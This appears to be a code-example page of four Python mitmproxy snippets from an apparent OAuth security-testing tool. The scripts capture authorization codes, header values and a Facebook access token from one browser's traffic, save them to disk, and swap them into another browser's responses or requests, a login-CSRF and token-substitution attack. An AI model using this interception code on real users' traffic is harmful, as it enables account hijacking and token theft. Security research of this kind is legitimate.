예제 #1
0
 def csrf_substitude_code_in_location(self, target,
                                      flow: mitmproxy.http.HTTPFlow):
     if "location" in flow.response.headers.keys():
         location = flow.response.headers["location"]
         if target not in location:
             return False
         self.logger.write_info("csrf on key value in location header")
         self.logger.write_info("[location]: " + location)
         if self.browserID in flow.request.headers.keys():
             key_value = extract_code_from_content(location, target)
             self.logger.write_info("[target] " + target + " " + key_value)
             self.logger.write_file(self.RAM + target, key_value)
             self.logger.write_info("Successfully save key value to " +
                                    self.RAM + target)
             flow.kill()
             self.logger.write_info("kill flow")
         else:
             self.logger.write_info(
                 "[ORIGIN " + target + "] " +
                 extract_code_from_content(location, target))
             with open(self.RAM + target, 'r+') as f:
                 key_value = f.readlines()[0]
             self.logger.write_info("[CHANGE " + target + "] " + key_value)
             flow.response.headers["location"] = substitute_code(
                 location, target, key_value)
             self.logger.write_info("If succeed? " + str(
                 key_value in flow.response.headers["location"]))
         return True
     return False
예제 #2
0
 def csrf_substitude_code_in_text(self, target,
                                  flow: mitmproxy.http.HTTPFlow):
     if target in flow.response.text:
         self.logger.write_info("csrf on value in response text")
         if self.browserID in flow.request.headers.keys():
             key_value = extract_code_from_content(flow.response.text,
                                                   target)
             self.logger.write_info("[target] " + target + " " + key_value)
             self.logger.write_file(self.RAM + target, key_value)
             self.logger.write_info("Successfully save key value to " +
                                    self.RAM + target)
             flow.kill()
             self.logger.write_info("kill flow")
         else:
             self.logger.write_info(
                 "[ORIGIN " + target + "] " +
                 extract_code_from_content(flow.response.text, target))
             with open(self.RAM + target, 'r+') as f:
                 key_value = f.readlines()[0]
             self.logger.write_info("[CHANGE " + target + "] " + key_value)
             substitute_access_token_in_text(flow, target, key_value)
             self.logger.write_info("If succeed? " +
                                    str(key_value in flow.response.text))
         return True
     return False
예제 #3
0
 def csrf_substitude_header(self, target, flow: mitmproxy.http.HTTPFlow):
     if target in flow.response.headers.keys():
         self.logger.write_info("csrf change a whole header value")
         value = flow.response.headers[target]
         if self.browserID in flow.request.headers.keys():
             key_value = value
             self.logger.write_info("[target] " + target + " " + key_value)
             self.logger.write_file(self.RAM + target, key_value)
             self.logger.write_info("Successfully save key value to " +
                                    self.RAM + target)
             flow.kill()
             self.logger.write_info("kill flow")
         else:
             self.logger.write_info("[ORIGIN " + target + "] " + value)
             with open(self.RAM + target, 'r+') as f:
                 key_value = f.readlines()[0]
             self.logger.write_info("[CHANGE " + target + "] " + key_value)
             flow.response.headers[target] = key_value
             self.logger.write_info("If succeed? " + str(
                 key_value in flow.response.headers[target]))
예제 #4
0
def request(flow: mitmproxy.http.HTTPFlow):
    """
        The full HTTP request has been read.
    """
    global log_file
    host = checker.check_host(flow)
    if host:
        if checker.check_TLS(flow):
            logger.write(log_file, \
                "[TLS] " + flow.request.pretty_url)

    if "test.xxx" in flow.request.host:
        flow.kill()

    # csrf
    global access_token
    target = "fb_access_token="
    if target in flow.request.pretty_url:
        if "longming" in flow.request.headers.keys():
            # access_token = csrf.extract_code(flow, target)
            access_token = flow.request.pretty_url
            logger.write_info(log_file, "[TOKEN] " + access_token)
            assert access_token
            logger.write_file("RAM/access_token", access_token)
            flow.kill()
        else:
            l = os.listdir('RAM')
            while not l:
                time.sleep(1)
                l = os.listdir('RAM')
            logger.write_info(
                log_file, "[ORIGIN TOKEN] " + csrf.extract_code(flow, target))
            with open('RAM/' + l[0], 'r+') as f:
                access_token = f.readlines()[0]
            logger.write_info(log_file, "[CHANGE TOKEN] " + access_token)
            assert access_token
            # assert csrf.csrf_request(flow, target, access_token)
            flow.request.url = access_token